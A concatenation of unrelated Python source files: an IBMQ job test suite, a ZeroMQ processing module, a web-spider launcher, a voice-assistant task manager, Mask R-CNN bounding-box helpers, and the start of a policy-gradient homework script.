(past_two_month_tz_aware <= job.creation_date() <= past_month_tz_aware),
'job {} creation date {} not within range'.format(
job.job_id(), job.creation_date()))
def test_retrieve_jobs_db_filter(self):
"""Test retrieving jobs using db_filter."""
# Submit jobs with desired attributes.
qc = QuantumCircuit(3, 3)
qc.h(0)
qc.measure([0, 1, 2], [0, 1, 2])
job = self.sim_backend.run(transpile(qc, backend=self.sim_backend))
job.wait_for_final_state()
my_filter = {'backend.name': self.sim_backend.name(),
'summaryData.summary.qobj_config.n_qubits': 3,
'status': 'COMPLETED'}
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, skip=5, db_filter=my_filter,
start_datetime=self.last_month)
self.assertTrue(job_list)
for job in job_list:
job.refresh()
self.assertEqual(
job.summary_data_['summary']['qobj_config']['n_qubits'], 3,
"Job {} does not have correct data.".format(job.job_id())
)
def test_pagination_filter(self):
"""Test db_filter that could conflict with pagination."""
jobs = self.sim_backend.jobs(limit=25, start_datetime=self.last_month)
job = jobs[3]
job_utc = local_to_utc(job.creation_date()).isoformat()
db_filters = [
{'id': {'neq': job.job_id()}},
{'and': [{'id': {'neq': job.job_id()}}]},
{'creationDate': {'neq': job_utc}},
{'and': [{'creationDate': {'gt': job_utc}}]}
]
for db_filter in db_filters:
with self.subTest(filter=db_filter):
job_list = self.sim_backend.jobs(limit=25, db_filter=db_filter)
self.assertTrue(job_list)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in job_list],
"Job {} with creation date {} should not be returned".format(
job.job_id(), job_utc))
def test_retrieve_jobs_order(self):
"""Test retrieving jobs with different orders."""
job = self.sim_backend.run(self.bell)
job.wait_for_final_state()
newest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=True, start_datetime=self.last_month)
self.assertIn(job.job_id(), [rjob.job_id() for rjob in newest_jobs])
oldest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=False, start_datetime=self.last_month)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in oldest_jobs])
def test_retrieve_failed_job_simulator_partial(self):
"""Test retrieving partial results from a simulator backend."""
job = submit_job_one_bad_instr(self.sim_backend)
result = job.result(partial=True)
self.assertIsInstance(result, Result)
self.assertTrue(result.results[0].success)
self.assertFalse(result.results[1].success)
@slow_test
def test_pulse_job(self):
"""Test running a pulse job."""
backends = self.provider.backends(open_pulse=True, operational=True)
if not backends:
raise SkipTest('Skipping pulse test since no pulse backend found.')
backend = least_busy(backends)
config = backend.configuration()
defaults = backend.defaults()
inst_map = defaults.instruction_schedule_map
# Run 2 experiments - 1 with x pulse and 1 without
x = inst_map.get('x', 0)
measure = inst_map.get('measure', range(config.n_qubits)) << x.duration
ground_sched = measure
excited_sched = x | measure
schedules = [ground_sched, excited_sched]
job = backend.run(schedules, meas_level=1, shots=256)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
self.assertTrue(job.done(), "Job {} didn't complete successfully.".format(job.job_id()))
self.assertIsNotNone(job.result(), "Job {} has no result.".format(job.job_id()))
def test_retrieve_from_retired_backend(self):
"""Test retrieving a job from a retired backend."""
saved_backends = copy.copy(self.provider._backends)
try:
del self.provider._backends[self.sim_backend.name()]
new_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertTrue(isinstance(new_job.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job.backend().name(), 'unknown')
new_job2 = self.provider.backend.jobs(
db_filter={'id': self.sim_job.job_id()}, start_datetime=self.last_month)[0]
self.assertTrue(isinstance(new_job2.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job2.backend().name(), 'unknown')
finally:
self.provider._backends = saved_backends
def test_refresh_job_result(self):
"""Test re-retrieving job result via refresh."""
result = self.sim_job.result()
# Save original cached results.
cached_result = copy.deepcopy(result.to_dict())
self.assertTrue(cached_result)
# Modify cached results.
result.results[0].header.name = 'modified_result'
self.assertNotEqual(cached_result, result.to_dict())
self.assertEqual(result.results[0].header.name, 'modified_result')
# Re-retrieve result via refresh.
result = self.sim_job.result(refresh=True)
self.assertDictEqual(cached_result, result.to_dict())
self.assertNotEqual(result.results[0].header.name, 'modified_result')
@requires_device
def test_wait_for_final_state(self, backend):
"""Test waiting for job to reach final state."""
def final_state_callback(c_job_id, c_status, c_job, **kwargs):
"""Job status query callback function."""
self.assertEqual(c_job_id, job.job_id())
self.assertNotIn(c_status, JOB_FINAL_STATES)
self.assertEqual(c_job.job_id(), job.job_id())
self.assertIn('queue_info', kwargs)
queue_info = kwargs.pop('queue_info', None)
callback_info['called'] = True
if wait_time is None:
# Look for status change.
data = {'status': c_status, 'queue_info': queue_info}
self.assertNotEqual(data, callback_info['last data'])
callback_info['last data'] = data
else:
# Check called within wait time.
if callback_info['last call time'] and job._status not in JOB_FINAL_STATES:
self.assertAlmostEqual(
time.time() - callback_info['last call time'], wait_time, delta=0.2)
callback_info['last call time'] = time.time()
def job_canceller(job_, exit_event, wait):
exit_event.wait(wait)
cancel_job(job_)
qc = get_large_circuit(backend)
wait_args = [5, None]
for wait_time in wait_args:
with self.subTest(wait_time=wait_time):
# Put callback data in a dictionary to make it mutable.
callback_info = {'called': False, 'last call time': 0.0, 'last data': {}}
cancel_event = Event()
job = backend.run(transpile(qc, backend=backend))
# Cancel the job after a while.
Thread(target=job_canceller, args=(job, cancel_event, 60), daemon=True).start()
try:
job.wait_for_final_state(timeout=90, wait=wait_time,
callback=final_state_callback)
self.assertTrue(job.in_final_state())
self.assertTrue(callback_info['called'])
cancel_event.set()
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
def test_wait_for_final_state_timeout(self):
"""Test waiting for job to reach final state times out."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
validate_qobj=True)
try:
self.assertRaises(IBMQJobTimeoutError, job.wait_for_final_state, timeout=0.1)
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
cancel_job(job)
def test_job_submit_partial_fail(self):
"""Test job submit partial fail."""
job_id = []
def _side_effect(self, *args, **kwargs):
# pylint: disable=unused-argument
job_id.append(self.job_id)
raise RequestsApiError('Kaboom')
fail_points = ['put_object_storage', 'callback_upload']
for fail_method in fail_points:
with self.subTest(fail_method=fail_method):
with mock.patch.object(RestJob, fail_method,
side_effect=_side_effect, autospec=True):
with self.assertRaises(IBMQBackendApiError):
self.sim_backend.run(self.bell)
self.assertTrue(job_id, "Job ID not saved.")
job = self.sim_backend.retrieve_job(job_id[0])
self.assertEqual(job.status(), JobStatus.CANCELLED,
f"Job {job.job_id()} status is {job.status()} and not cancelled!")
def test_job_circuits(self):
"""Test job circuits."""
self.assertEqual(str(self.bell), str(self.sim_job.circuits()[0]))
def test_job_backend_options(self):
"""Test job backend options."""
run_config = {'shots': 2048, 'memory': True}
job = self.sim_backend.run(self.bell, **run_config)
self.assertLessEqual(run_config.items(), job.backend_options().items())
def test_job_header(self):
"""Test job header."""
|
BaseModule.py
|
"""
Created by Danil Lykov @danlkv on 14/02/19
"""
import zmq, os, time
import json
from pprint import pprint
import multiprocessing as prc
from goalnet.helpers.log_init import log
from goalnet.core.utils import themify, dethemify, get_network_config
import trio
class BaseModule:
"""
A base class for Goal Net data processing modules
"""
def __init__(self, netconf,name='baseModule'):
self.netconf = netconf
self.source = self._get_mux_socket()
self.drain = self._get_dmx_socket()
self.name = name
def _print(self,msg):
"""
        A simple wrapper around logging so that internal
        params can be attached to the log message later
"""
log.info(msg)
"""
Some methods to get sockets of MUX and DMX
"""
def _get_dmx_socket(self):
ctx = zmq.Context()
s = ctx.socket(zmq.PUSH)
s.connect(self.netconf.get_address("DMX"))
return s
    def _get_mux_socket(self, topics=(b'',)):
ctx = zmq.Context()
s = ctx.socket(zmq.SUB)
for topic in topics:
s.setsockopt(zmq.SUBSCRIBE, topic)
s.connect(self.netconf.get_address("MUX_out"))
return s
def _recv(self):
"""
wrapper for receiving a data from sub socket
need to get topic first, then parse json from
remaining data
"""
raw = self.source.recv_string()
topic, msg = dethemify(raw)
return msg
def handle_action(self,msg):
raise NotImplementedError
def server_listen_loop(self):
"""
Loop forever and apply handle_action to
every message, then send result to dmx if any
"""
self._print("running...")
while True:
msg = self._recv()
notif = self.handle_action(msg)
if notif:
                self._print('sending {}'.format(notif))
self.drain.send_json(notif)
def start(self):
self.server_listen_loop()
def start_process(self):
process = prc.Process(target=self.start, name=self.name)
process.start()
self.process = process
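# Editor's illustrative sketch (not part of the original): BaseModule is meant
# to be subclassed with handle_action overridden. A hypothetical echo module,
# kept commented out because it needs a live MUX/DMX network to run:
#
#   class EchoModule(BaseModule):
#       def handle_action(self, msg):
#           self._print('got {}'.format(msg))
#           return {'echo': msg}   # anything returned is pushed to the DMX socket
#
#   # netconf = get_network_config()   # assumed helper from goalnet.core.utils
#   # EchoModule(netconf, name='echo').start_process()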
|
SpiderMan.py
|
from multiprocessing import Queue, Process
from distributedSpider.NodeManager import NodeManager
if __name__=='__main__':
    # Initialize the four queues
url_q = Queue()
result_q = Queue()
store_q = Queue()
conn_q = Queue()
    # Create the distributed manager
node = NodeManager()
manager = node.start_Manager(url_q,result_q)
    # Create the URL manager, data extraction and data storage processes
url_manager_proc = Process(target=node.url_manager_proc, args=(url_q, conn_q, 'http://baike.baidu.com/view/284853.htm'))
result_solve_proc = Process(target=node.result_solve_proc, args=(result_q, conn_q, store_q,))
store_proc = Process(target=node.store_proc, args=(store_q,))
    # Start the three processes and the distributed manager
url_manager_proc.start()
result_solve_proc.start()
store_proc.start()
manager.get_server().serve_forever()
|
taskmanager.py
|
import datetime
import glob
import json
import multiprocessing
import os
import math
import random
import lxml
import requests
import subprocess
from time import sleep
from urllib.request import urlopen
import wikipedia
from bs4 import BeautifulSoup as soup
from pytube import YouTube
from youtubesearchpython import VideosSearch
from etc.memory import MemoryUnit
from etc.qna_parser import Parser
p = Parser()
jokelist = []
class TaskManager(MemoryUnit):
def __init__(self):
super().__init__()
pass
def ocr_read(self):
# observe_direction()
# text = read_text()
# return text
pass
def weather(self, api_key, city):
# base_url variable to store url
base_url = "http://api.openweathermap.org/data/2.5/weather?"
# Give city name
city_name = city
# complete_url variable to store
# complete url address
complete_url = base_url + "appid=" + api_key + "&q=" + city_name
# get method of requests module
# return response object
response = requests.get(complete_url)
# json method of response object
# convert json format data into
# python format data
x = response.json()
# Now x contains list of nested dictionaries
# Check the value of "cod" key is equal to
# "404", means city is found otherwise,
# city is not found
if x["cod"] != "404":
# store the value of "main"
# key in variable y
y = x["main"]
# store the value corresponding
# to the "temp" key of y
current_temperature = math.ceil((int(y["temp"]) - 273))
# store the value corresponding
# to the "pressure" key of y
# store the value corresponding
# to the "humidity" key of y
current_humidity = y["humidity"]
# store the value of "weather"
# key in variable z
z = x["weather"]
# store the value corresponding
# to the "description" key at
# the 0th index of z
weather_description = z[0]["description"]
return weather_description, current_temperature, current_humidity
else:
return "City Not Found", "City Not Found", "City Not Found"
def take_note(self, text):
"""just pass the text to be saved or notted down"""
self.date = str(datetime.datetime.now().date()) + "%" + str(datetime.datetime.now().hour) + "+" + str(
datetime.datetime.now().minute) + "}"
self.file_name = "notes/" + str(self.date).replace(":", "-") + "-note.txt"
with open(self.file_name, "w") as f:
f.write(text)
# subprocess.Popen(["notepad.exe", self.file_name])
def get_note(self, args):
"""
available args:
latest : reads latest note
total : returns num of notes
yesterday : returns yesterday's note
"""
self.list_of_files = glob.glob('notes/*') # * means all if need specific format then *.csv
if "latest" in args.lower() or "last note" in args.lower():
self.latest_file = max(self.list_of_files, key=os.path.getctime)
self.latest_file = str(self.latest_file.replace("notes", ""))
with open(f"notes{self.latest_file}", "r") as g:
return g.read()
elif "total" in args.lower() or "how many" in args.lower():
return len(self.list_of_files)
elif "yesterday" in args.lower():
self.ys = str(datetime.datetime.now().day)
self.ys = int(self.ys) - 1
print(self.ys)
self.mn = datetime.datetime.now().month
self.yr = datetime.datetime.now().year
print(f"{self.yr}-{self.mn}-{self.ys}")
for i in self.list_of_files:
if f"{self.yr}-{self.mn}-{self.ys}" in i:
with open(f"{i}", "r") as re:
return re
else:
return "you haven't made any entries yesterday"
    def get_note_time(self, filename, arg="ymd"):
        # Note filenames look like "notes/<Y-m-d>%<hour>+<minute>}-note.txt",
        # so the pieces are recovered by locating the separator characters.
        self.ymd = filename[:filename.index("%")]
        self.hour = filename[filename.index("%") + 1:filename.index("+")]
        self.minute = filename[filename.index("+") + 1:filename.index("}")]
        if arg == "ymd":
            return self.ymd
        elif arg == "hr":
            return self.hour
        elif arg == "min":
            return self.minute
def news(self, headlines):
"""
--------------------------------------------------------------------------------------------
:ARGS: Headlines(int) [number of headlines you want]
:PARSING: https://news.google.com/rss?hl=en-US&gl=US&ceid=US:en
change US in the above link to IN for Indian news, CA for Canada, and so on.
        Keep it just https://news.google.com/rss for dynamic location selection based on your IP
address
:OUTPUT: returns a list of headlines
--------------------------------------------------------------------------------------------
"""
self.nl = []
try:
self.int_num = int(headlines)
print(self.int_num)
self.newsurl = "https://news.google.com/rss?hl=en-US&gl=US&ceid=US:en"
self.root = urlopen(self.newsurl)
self.xmlpage = self.root.read()
self.root.close()
self.souppage = soup(self.xmlpage, "xml")
self.newslist = self.souppage.findAll("item")
for news in self.newslist[:self.int_num]:
# speak(news.pubDate.text)
sleep(1)
self.nl.append(news.title.text)
return self.nl
except Exception as e:
return f"Looks like something went wrong. Try connecting to internet. {e}"
def wiki(self, query):
"""
Get summary of topics from wikipedia.
Requested args: query(the topic you want to search)
NOTE: INCREASE sentences=3 TO ANY NUMBER IF REQUIRED,
HIGHER THE VALUE = LONGER INFO
        SMALLER THE VALUE = LESS INFO AND NOT MUCH USEFUL INFO
IS RETRIEVED
"""
try:
return wikipedia.summary(query, sentences=3)
except Exception as e:
return e
def parse_youtube_query(self, query):
videosSearch = VideosSearch(query, limit = 1)
self.get_youtube_audio(videosSearch.result()['result'][0]['link'])
def get_youtube_audio(self, link):
"""
:INPUT: Youtube video link
:PROCESS: Downloads the audio of the video only,
and saves it to music directory.
:OUTPUT: Returns nothing, just saves the music at /music dir
"""
self.yt = YouTube(link)
self.t = self.yt.streams.filter(only_audio=True)
self.t[0].download("music/")
print(f"downloaded {link}")
"""
def player(self):
global stop_thread
url = "https://www.youtube.com/watch?v=svT7uKdNphU"
video = pafy.new(url)
best = video.getbest()
playurl = best.url
Instance = vlc.Instance()
player = Instance.media_player_new()
Media = Instance.media_new(playurl)
Media.get_mrl()
player.set_media(Media)
player.play()
"""
def play(self, query):
"""
os.startfile("music/coldbrew - Simple.mp4")
sleep(2)
# self.player =
print("Threading succeded")
x = input(": ")
if x == "quit":
subprocess.call(["taskkill", "/F", "/IM", "Wmplayer.exe"])
# in linux: killall -9 totem
"""
"""
players = multiprocessing.Process(target=self.player(), daemon=True)
players.start()
x = input(":")
if x == "quit":
players.terminate()"""
def memorise(self, question, answer):
"""
:param question:
:param answer:
:return:
"""
print(p.parse_question(question))
print(p.parse_answer(answer))
# self.data_entry(question, answer)
def google(self, query):
"""
:param query:
:return: google snippet text
"""
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582"
}
html = requests.get(f'https://www.google.com/search?q={query}', headers=headers).text
self.sp = soup(html, 'lxml')
try:
summary = self.sp.select_one('.Uo8X3b+ span').text
if len(summary) == 0:
return None
else:
return summary
        except Exception:
try:
l = self.sp.select(".TrT0Xe")
self.google_list = []
for i in l:
self.google_list.append(i.text)
if len(self.google_list) == 0:
return None
else:
return ", ".join(self.google_list)
            except Exception:
return None
def joke(self):
"""
return jokes
"""
f = r"https://official-joke-api.appspot.com/random_ten"
try:
data = requests.get(f)
data = json.loads(data.text)
if len(jokelist) == 0:
print("form web")
for jokes in data:
jokelist.append(jokes["setup"]+" "+jokes["punchline"])
return random.choice(jokelist)
else:
print("from storage")
return random.choice(jokelist)
except Exception as e:
return "unable to get jokes right now"
|
bbox_regression.py
|
"""
This file has functions about generating bounding box regression targets
"""
from ..pycocotools.mask import encode
import numpy as np
from ..logger import logger
from .bbox_transform import bbox_overlaps, bbox_transform
from rcnn.config import config
import math
import cv2
import PIL.Image as Image
import threading
import Queue
def compute_bbox_regression_targets(rois, overlaps, labels):
"""
given rois, overlaps, gt labels, compute bounding box regression targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
:return: targets[i][class, dx, dy, dw, dh] k * 5
"""
# Ensure ROIs are floats
rois = rois.astype(np.float, copy=False)
# Sanity check
if len(rois) != len(overlaps):
logger.warning('bbox regression: len(rois) != len(overlaps)')
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
logger.warning('bbox regression: len(gt_inds) == 0')
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
targets = np.zeros((rois.shape[0], 5), dtype=np.float32)
targets[ex_inds, 0] = labels[ex_inds]
targets[ex_inds, 1:] = bbox_transform(ex_rois, gt_rois)
return targets
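# Editor's sketch (assumption, not part of the original file): `bbox_transform`
# above is imported from .bbox_transform and is assumed here to use the standard
# Fast R-CNN delta encoding. A self-contained reference version for comparison:
def _reference_bbox_deltas(ex_rois, gt_rois):
    """(dx, dy, dw, dh) deltas that map each ex box onto its gt box."""
    ex_w = ex_rois[:, 2] - ex_rois[:, 0] + 1.0
    ex_h = ex_rois[:, 3] - ex_rois[:, 1] + 1.0
    ex_cx = ex_rois[:, 0] + 0.5 * ex_w
    ex_cy = ex_rois[:, 1] + 0.5 * ex_h
    gt_w = gt_rois[:, 2] - gt_rois[:, 0] + 1.0
    gt_h = gt_rois[:, 3] - gt_rois[:, 1] + 1.0
    gt_cx = gt_rois[:, 0] + 0.5 * gt_w
    gt_cy = gt_rois[:, 1] + 0.5 * gt_h
    deltas = np.vstack(((gt_cx - ex_cx) / ex_w,
                        (gt_cy - ex_cy) / ex_h,
                        np.log(gt_w / ex_w),
                        np.log(gt_h / ex_h))).transpose()
    return deltas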
def add_bbox_regression_targets(roidb):
"""
given roidb, add ['bbox_targets'] and normalize bounding box regression targets
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
:return: means, std variances of targets
"""
logger.info('bbox regression: add bounding box regression targets')
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
num_classes = roidb[0]['gt_overlaps'].shape[1]
for im_i in range(num_images):
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
roidb[im_i]['bbox_targets'] = compute_bbox_regression_targets(
rois, max_overlaps, max_classes)
if config.TRAIN.BBOX_NORMALIZATION_PRECOMPUTED:
# use fixed / precomputed means and stds instead of empirical values
means = np.tile(np.array(config.TRAIN.BBOX_MEANS), (num_classes, 1))
stds = np.tile(np.array(config.TRAIN.BBOX_STDS), (num_classes, 1))
else:
# compute mean, std values
class_counts = np.zeros((num_classes, 1)) + 1e-14
sums = np.zeros((num_classes, 4))
squared_sums = np.zeros((num_classes, 4))
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
if cls_indexes.size > 0:
class_counts[cls] += cls_indexes.size
sums[cls, :] += targets[cls_indexes, 1:].sum(axis=0)
squared_sums[cls, :] += (targets[cls_indexes,
1:]**2).sum(axis=0)
means = sums / class_counts
# var(x) = E(x^2) - E(x)^2
stds = np.sqrt(squared_sums / class_counts - means**2)
# normalized targets
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] -= means[cls, :]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] /= stds[cls, :]
return means.ravel(), stds.ravel()
def expand_bbox_regression_targets(bbox_targets_data, num_classes):
"""
expand from 5 to 4 * num_classes; only the right class has non-zero bbox regression targets
:param bbox_targets_data: [k * 5]
:param num_classes: number of classes
:return: bbox target processed [k * 4 num_classes]
bbox_weights ! only foreground boxes have bbox regression computation!
"""
classes = bbox_targets_data[:, 0]
bbox_targets = np.zeros((classes.size, 4 * num_classes), dtype=np.float32)
bbox_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
indexes = np.where(classes > 0)[0]
for index in indexes:
cls = classes[index]
start = int(4 * cls)
end = start + 4
bbox_targets[index, start:end] = bbox_targets_data[index, 1:]
bbox_weights[index, start:end] = config.TRAIN.BBOX_WEIGHTS
return bbox_targets, bbox_weights
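# Editor's worked example (illustrative): with num_classes = 3, a single target
# row [2, dx, dy, dw, dh] expands to 4 * 3 = 12 columns where only the slot for
# class 2 (columns 8..11) is populated:
#   bbox_targets = [0, 0, 0, 0,  0, 0, 0, 0,  dx, dy, dw, dh]
#   bbox_weights = [0, 0, 0, 0,  0, 0, 0, 0,  w0, w1, w2, w3]  # config.TRAIN.BBOX_WEIGHTS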
def compute_mask_and_label(ex_rois, ex_labels, seg, flipped):
# assert os.path.exists(seg_gt), 'Path does not exist: {}'.format(seg_gt)
# im = Image.open(seg_gt)
# pixel = list(im.getdata())
# pixel = np.array(pixel).reshape([im.size[1], im.size[0]])
im = Image.open(seg)
pixel = list(im.getdata())
ins_seg = np.array(pixel).reshape([im.size[1], im.size[0]])
if flipped:
ins_seg = ins_seg[:, ::-1]
rois = ex_rois
n_rois = ex_rois.shape[0]
label = ex_labels
class_id = config.CLASS_ID
mask_target = np.zeros((n_rois, 28, 28), dtype=np.int8)
mask_label = np.zeros((n_rois), dtype=np.int8)
for n in range(n_rois):
target = ins_seg[int(rois[n, 1]):int(rois[n, 3]),
int(rois[n, 0]):int(rois[n, 2])]
ids = np.unique(target)
ins_id = 0
max_count = 0
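        # Note (assumption): the instance map appears to follow the Cityscapes-style convention
        # where pixel value = class_id * 1000 + instance index, so id // 1000 recovers the
        # semantic class used in the check below.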
for id in ids:
if math.floor(id / 1000) == class_id[int(label[int(n)])]:
px = np.where(ins_seg == int(id))
x_min = np.min(px[1])
y_min = np.min(px[0])
x_max = np.max(px[1])
y_max = np.max(px[0])
x1 = max(rois[n, 0], x_min)
y1 = max(rois[n, 1], y_min)
x2 = min(rois[n, 2], x_max)
y2 = min(rois[n, 3], y_max)
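                # IoU between the ROI and this instance's bounding box:
                # intersection / (roi area + instance bbox area - intersection)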
iou = (x2 - x1) * (y2 - y1)
iou = iou / ((rois[n, 2] - rois[n, 0]) *
(rois[n, 3] - rois[n, 1]) + (x_max - x_min) *
(y_max - y_min) - iou)
if iou > max_count:
ins_id = id
max_count = iou
if max_count == 0:
continue
# print max_count
mask = np.zeros(target.shape)
idx = np.where(target == ins_id)
mask[idx] = 1
mask = cv2.resize(mask, (28, 28), interpolation=cv2.INTER_NEAREST)
mask_target[n] = mask
mask_label[n] = label[int(n)]
return mask_target, mask_label
def compute_bbox_mask_targets_and_label(rois, overlaps, labels, seg, flipped):
"""
given rois, overlaps, gt labels, seg, compute bounding box mask targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
    :return: mask_targets (k * 28 * 28), mask_labels (k, ), and ex_inds of the example ROIs
"""
# Ensure ROIs are floats
    rois = rois.astype(np.float64, copy=False)
# Sanity check
if len(rois) != len(overlaps):
        print('bbox regression: this should not happen')
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
        print('something wrong : zero ground truth rois')
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
mask_targets, mask_label = compute_mask_and_label(ex_rois, labels[ex_inds],
seg, flipped)
return mask_targets, mask_label, ex_inds
def add_mask_targets(roidb):
"""
    given roidb, add ['mask_targets'], ['mask_labels'] and ['mask_inds'] for each image
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
    :return: None (the roidb entries are modified in place)
"""
    print('add bounding box mask targets')
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
    # Multi-threaded processing
    im_queue = Queue.Queue(maxsize=0)
    for im_i in range(num_images):
        im_queue.put(im_i)
    def process():
        while not im_queue.empty():
            im_i = im_queue.get()
            print("-----process img {}".format(im_i))
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
ins_seg = roidb[im_i]['ins_seg']
flipped = roidb[im_i]['flipped']
roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg, flipped)
threads = [threading.Thread(target=process, args=()) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
# Single thread
# for im_i in range(num_images):
# print "-----processing img {}".format(im_i)
# rois = roidb[im_i]['boxes']
# max_overlaps = roidb[im_i]['max_overlaps']
# max_classes = roidb[im_i]['max_classes']
# ins_seg = roidb[im_i]['ins_seg']
# # roidb[im_i]['mask_targets'] = compute_bbox_mask_targets(rois, max_overlaps, max_classes, ins_seg)
# roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
# compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg)
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
tf.logging.set_verbosity(tf.logging.ERROR)
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
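    # Standardize 'data' to zero mean / unit std, then rescale to the requested (mean, std);
    # the small 1e-8 offsets keep the operation numerically safe when the batch std is (near) zero.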
n_data = (data - np.mean(data)) / (np.std(data) + 1e-8)
return n_data * (std + 1e-8) + mean
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
        output_activation: activation of the output layer
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR CODE HERE
# Build dense-net of variable depth
with tf.variable_scope(scope):
placeholder = input_placeholder
for h in range(n_layers):
placeholder = tf.layers.dense(placeholder, size, activation=activation)
placeholder = tf.layers.dense(placeholder, output_size, activation=output_activation)
return placeholder
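# Hedged usage sketch (names are illustrative, not from the assignment): a policy head for a
# discrete task could be built as
#     logits = build_mlp(obs_ph, ac_dim, "policy", n_layers=2, size=64)
# which stacks two tanh hidden layers of width 64 followed by a linear output of width ac_dim.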
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
        Placeholders for batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
